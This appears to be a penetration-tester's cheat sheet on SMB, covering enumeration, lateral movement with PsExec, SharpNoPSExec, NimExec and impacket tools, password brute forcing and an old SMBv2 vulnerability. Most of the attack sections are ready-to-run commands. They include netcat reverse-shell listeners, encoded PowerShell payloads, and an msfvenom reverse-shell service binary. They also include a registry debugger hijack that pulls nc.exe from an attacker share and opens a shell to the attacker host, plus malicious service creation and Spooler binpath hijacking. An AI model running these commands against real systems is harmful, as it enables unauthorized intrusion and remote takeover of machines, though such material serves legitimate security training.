139,445 - SMB

Server Message Block (SMB) is a Windows network protocol used for sharing files, printers, and other resources, as well as for remote administration and communication between systems over the network.

Usage

General

# Download all files without prompting
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

# Mount a share (no authentication)
sudo mount -t cifs //10.10.10.10/target-share /mnt
sudo mount -t cifs - "username='',password=''" //10.10.10.10/my_share /mnt

# Mount a share (with authentication)
sudo mount -t cifs -o username=x7331,password=Pass123! //10.10.10.10/my_share /path/to/mount

Transfers

smbmap/smbclient

rpc

smbcacls

Enumeration

Basic enumeration can be performed with nmap and a couple of MSF's modules:

# Nmap
sudo nmap -sV -p 139,445 -script smb* 10.10.10.10

# MSF - Enumerate SMB's version
msf6 > use auxiliary/scanner/smb/smb_version

# MSF - Enumerate users
msf6 > use auxiliary/scanner/smb/smb_login

enum4linux-ng is a Python rewrite of the original enum4linux.pl, designed to automate information gathering from Windows and Samba systems. It wraps around nmblookup, net, rpcclient, and smbclient to extract usernames, groups, shares, domain details, and password policies, providing structured output that accelerates Active Directory and SMB reconnaissance.

enum4linux-ng 172.16.10.3

impacket-samrdump uses the SAMR protocol to enumerate users, groups, and policy data from Windows or domain controllers. By leveraging Impacket, it exposes domain account structures without requiring administrative privileges, making it effective for mapping Active Directory environments and identifying potential escalation paths.

impacket-samrdump 172.16.10.3

Lateral Movement

To successfully use SMB-based techniques, administrative privileges on the target host are typically required. In addition, the necessary network ports, usually TCP 445 and 139 (and sometimes 135 depending on the tool), must be open and accessible. Because of User Account Control (UAC), only the built-in local administrator account with RID 500 and privileged domain users can fully leverage tools such as PsExec for remote execution.

Named Pipes

Named pipes are communication channels that allow processes to exchange data locally or remotely. In Windows, they are commonly exposed over SMB and are used to interact with services such as the Service Control Manager (SCM) or Task Scheduler.

Named pipes are accessed through the IPC$ share over port 445 and allow remote communication with Windows services. For example, the svcctl pipe is used to remotely create, start, or stop services and is leveraged by tools such as PsExec and smbexec. Similarly, the atsvc pipe allows remote task scheduling and is used by tools like atexec.

Windows

PsExec

PsExec, part of Microsoft’s Sysinternals suite, enables RCE and retrieves output through a named pipe over SMB:

1. The tool first connects to the hidden ADMIN$ share, which maps to the C:\Windows directory on the target system.

2. It then uses the SCM to create and start the PsExec service and establish a named pipe for communication.

3. Finally, it redirects the console I/O through this pipe, enabling interactive command execution.

An advantage of PsExec is that it solves the “double-hop” authentication problem. It passes credentials directly and creates an interactive logon session (Type 2), which allows access to network resources from the remote session.

# As the target user
.\PsExec.exe \\SRV02 -i -u batman\x7331 -p Passw0rd123! cmd

# As SYSTEM
.\PsExec.exe \\SRV02 -i -s -u batman\x7331 -p Passw0rd123! cmd

SharpNoPSExec

SharpNoPSExec is designed to reduce detection by avoiding the creation of new services or writing files to disk. Instead, it searches for existing services that are disabled or manually started, currently stopped, and running with LocalSystem privileges. It then temporarily modifies the binary path of one service to execute the attacker’s payload. After execution, the tool restores the original configuration, reducing the likelihood of detection.

# Start a listener (attacker host)
nc -lnvp 8080

# Execute the revshell payload to receive a SYSTEM shell (pivot host)
.\SharpNoPSExec.exe --target=172.20.0.52 --payload="c:\windows\system32\cmd.exe /c powershell -exec bypass -nop -e ...SNIP...AbwBzAGUAKAApAA=="

NimExec

NimExec is a fileless remote execution tool that interacts directly with the Service Control Manager Remote Protocol (MS‑SCMR). It modifies the binary path of a chosen service to run a command and later restores the original configuration. This is achieved by crafting custom RPC packets over SMB and the svcctl pipe. NimExec supports authentication using NTLM hashes and benefits from cross‑platform compilation due to the Nim programming language.

# Installation process
$ sudo apt install nim
$ git clone https://github.com/frkngksl/NimExec
$ cd NimExec/
$ nimble install ptr_math nimcrypto hostname
$ nim c -d:release --gc:markAndSweep --cpu:amd64 --os:windows --cc:gcc --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -o:NimExec.exe Main.nim

# Start a listener (attacker host)
nc -lnvp 8080

# Execute the revshell payload to receive a SYSTEM shell (pivot host)
> .\NimExec -u x7331 -d batman.local -p Passw0rd123! -t 172.10.10.252 -c "cmd.exe /c powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==" -v

Registry-based execution

If an attacker has remote registry write access, this can effectively provide RCE. This method uses the winreg SMB pipe and requires the Remote Registry service to be enabled, which is usually the case on Windows Server systems. A common technique is to modify the Image File Execution Options registry key for a frequently used application. When the program is launched, the specified payload is executed.

To host a payload, an SMB share can be created on the attacker system. The registry key can then be modified so that when a program such as Microsoft Edge runs, it triggers the attacker’s payload and establishes a reverse shell.

# Start an SMB server (attacker host)
sudo python3 smbserver.py share -smb2support /home/x7331/nc.exe

# Start a listener (attacker host)
nc -lnvp 8080

# Execute the payload (pivot host)
reg.exe add "\\host02.batman.local\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t reg_sz /d "cmd /c copy \\172.30.10.99\share\nc.exe && nc.exe -e \windows\system32\cmd.exe 172.30.10.99 8080"

To use SMB shares without authentication, insecure guest authentication must be enabled. This requires setting the AllowInsecureGuestAuth registry value to 1. By default, this setting is disabled in SMBv2 and SMBv3.

# Enable guest authentication
reg.exe add HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth /t REG_DWORD /d 1 /f

# Confirm guest authentication
reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth

Linux

From a Linux host, we can use multiple tools from Impacket.

impacket-psexec

The psexec.py script provides functionality similar to the Windows PsExec utility which results in a reliable SYSTEM shell, although more detectable because it writes files to disk.

# Get a SYSTEM shell for the target host
impacket-psexec BATMAN/x7331:'Passw0rd123!'@182.30.10.53

impacket-smbexec

The smbexec.py script achieves RCE without uploading a binary to the target. Instead, it leverages native Windows SMB and MSRPC mechanisms to create and manage a service remotely, communicating exclusively over port 445. Because it avoids writing executables to disk, this approach is generally quieter and reduces the risk of detection, although it is slightly less interactive than impacket-psexec.

# Get a SYSTEM shell for the target host
impacket-smbexec BATMAN/x7331:'Passw0rd123!'@182.30.10.53

impacket-services

The services.py script allows direct interaction with Windows services through MSRPC. It can list, start, stop, create, delete, and modify services remotely. This makes it useful for lateral movement and privilege escalation, as attackers can either create a new malicious service or modify an existing one to execute a payload. This method is non‑interactive, meaning command output is not displayed in real time.

# List services
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 list

# Create the payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.207 LPORT=9001 -f exe-service -o revshell_9001.exe

# Start an SMB server to host the payload
sudo impacket-smbserver share -smb2support ./
 
# Start a listener
nc -lnvp 9001

# Create a new malicious service
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 create -name 'Service Backdoor' -display 'Service Backdoor' -path "\\\\10.10.14.207\\share\\revshell_9001.exe"

# View the service configuration
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 config -name 'Service Backdoor'

# Start the malicious service to receive a SYSTEM shell
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 start -name 'Service Backdoor'

# Delete the malicious service
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 delete -name 'Service Backdoor'

This method is also useful for abusing services that run under specific privileged accounts, allowing impersonation or execution in a higher‑privilege context.

# Check the target service's configuration
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 config -name Spooler

# Modify the binpath and configurations as required (start type 2 = AUTO START)
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 change -name Spooler -path "\\\\10.10.14.207\\share\\revshell_9001.exe" -start_type 2

# Start the malicious service
impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 start -name Spooler

impacket-atexec

Finally, the atexec.py script uses the Windows Task Scheduler through the atsvc named pipe. It schedules a remote task that executes a specified command or payload and retrieves the output through the ADMIN$ share. This technique is also file‑less and stealthier than traditional service‑based approaches. However, it requires clock synchronization between the attacker and the target system and is typically used to deploy reverse shells or short‑lived commands during lateral movement.

# Start a listener
nc -lnvp 8080

# Execute the revshell payload to receive a SYSTEM shell
impacket-atexec BATMAN/x7331:'Passw0rd123!'@182.30.10.53 "powershell -e ...SNIP...AbwBzAGUAKAApAA=="

Attacks

Passwords

Brute Force

# BFA with wordlists
hydra -L <user-list> -P <pass-list> smb://<target-ip>

# BFA a target user
hydra -l <username> -P <pass-list> smb://<target-ip>

Password Spray

Nmap Vuln Scan

NTLM Theft

For NTLM theft via SMB, see here.

NTLM Relay

For NTLM Relay-related information, see here.

Vulnerabilities

SMBv2 Negotiation

Windows Vista (Gold, SP1, SP2), Windows Server 2008 (Gold, SP2), and Windows 7 Release Candidate are affected by a RCE vulnerability (CVE-2009-3103), aka SMBv2 Negotiation Vulnerability, in the SMBv2 protocol implementation within srv2.sys, the kernel-mode driver responsible for SMBv2 handling in certain Microsoft Windows versions. A flaw in the processing of the Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet allows an attacker to trigger an array index error by supplying an ampersand (&) character. This malformed input leads to an out-of-bounds memory dereference in kernel space.

When exploited, it can result in either a denial of service through a system crash (blue screen) or, under certain conditions, arbitrary code execution with kernel-level privileges. The attack is conducted over TCP port 445 and does not require authentication, making it highly dangerous when SMBv2 services are exposed to untrusted networks.

A MSF module exists for exploiting the vulnerability.

 msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index